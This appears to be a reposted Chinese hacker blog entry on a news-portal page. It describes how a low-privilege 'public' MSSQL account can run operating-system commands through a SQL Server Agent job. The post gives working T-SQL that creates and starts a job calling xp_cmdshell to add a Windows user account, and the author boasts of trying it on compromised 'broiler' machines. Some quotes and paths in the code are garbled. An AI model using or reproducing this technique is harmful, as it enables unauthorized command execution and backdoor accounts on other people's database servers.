中山娱乐舆情问政百科通信亲子房产旅游理财书画教育校园文史人才女性

关于public权限执行系统命令

2019/10/8 12:13:33 来源:中国西藏网
作者:伤心的鱼[BCT] 出自惘然 blog

最早1986提出的access数据库执行系统命令,结果忽悠了一圈人 哈哈 不过这个public权限执行系统命令也算是个鸡肋…. YY 一下 安慰一下被我忽悠的同志们

很多朋友说public权限不能执行命令 其实是可以执行的~ 但是前提是启动
Sql server Agent 服务

其实SQL Server Agent 是一个任务规划器和警报管理器 默认安装 sql server是不开启的
不过我上午测试十个肉鸡成功了三四次。 看来有的管理员还是需要这个东西来提供报警的

其实就是利用MSSQL的作业处理也是可以执行命令 但是在@server_name要指定你的sql的服务器名
\

SQL Server Agent 这服务必须开启

开启服务后进入查询分析器. 这里我是用新建的public用户

首先 Select host_name() 获取当前库服务器机器名
然后在查询分析器执行下面的代码

程序代码 USE msdb
EXEC sp_add_job @job_name = GetSystemOnSQL,
@enabled = 1,
@delete_level = 1
EXEC sp_add_jobstep @job_name = GetSystemOnSQL,
@step_name = Exec my sql,
@subsystem = TSQL,
@command = exec master..xp_execresultset Nselect exec
master..xp_cmdshell "net user iisloger hook ./add> c:fish.txt",NMaster
EXEC sp_add_jobserver @job_name = GetSystemOnSQL,
@server_name = 这里是你的SQL服务器名
EXEC sp_start_job @job_name = GetSystemOnSQL


直接net user了一个iisloger的用户 直接拿去测试也算是一种思路

相关阅读:
海外房产网 https://m.uoolu.com/
  • 中山新闻网版权所有 本站点信息未经允许不得复制或镜像
  • hereur.com.cn copyright 2000 - 2015
  • 冀ICP备09047539号-1 | 互联网新闻信息服务许可证编号:1312006002
  • 广播电视节目制作经营许可证(冀)字第101号|信息网络传播视听节目许可证0311618号